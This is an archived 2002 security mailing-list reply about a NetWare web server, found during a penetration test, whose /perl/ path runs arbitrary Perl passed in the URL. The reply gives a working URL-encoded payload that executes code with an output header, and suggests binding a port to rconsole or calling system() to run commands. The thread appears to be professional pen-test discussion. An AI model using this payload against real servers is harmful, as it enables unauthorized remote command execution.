From: Jon DeShirley (jond@csds.uidaho.edu)
Date: Wed Dec 18 2002 - 19:01:10 EST
> Hey - let me re-open a thread again, if you folks don't mind. I've found a
> server at one of our pen-test clients with this NetWare HTTP/HTTPS server.
> Attempt: http://address/perl/-v
> Result: NetWare port Copyright 1998 Novell Corporation.
> All rights reserved.
What does perl -V tell you, if anything at all? If you're lucky, this
will tell you if you've got libraries available to you with which you
can have some fun with minimal code. Otherwise, you'll have to code a
lot of the module functions into your URL.
> Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
> Result: IE just hangs there "DONE"
>
> Attempt: http://address/perl/-e%20print%201;
> Result: IE just hangs there "DONE"
These will hang because your browser doesn't know what kind of content
to display. Something like this should provide some output:
http://address/perl/-e%22%20print%20%22Content-type:%20text%2fplain\n\nhello\n%22%22
FYI, there's a Content-type database here:
http://reliableanswers.com/ContentType/
As for what to do, you could probably wire up a quick perl program to
bind an unprivledged port to a rconsole or just use it to system() some
commands.
--jon
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:26 EDT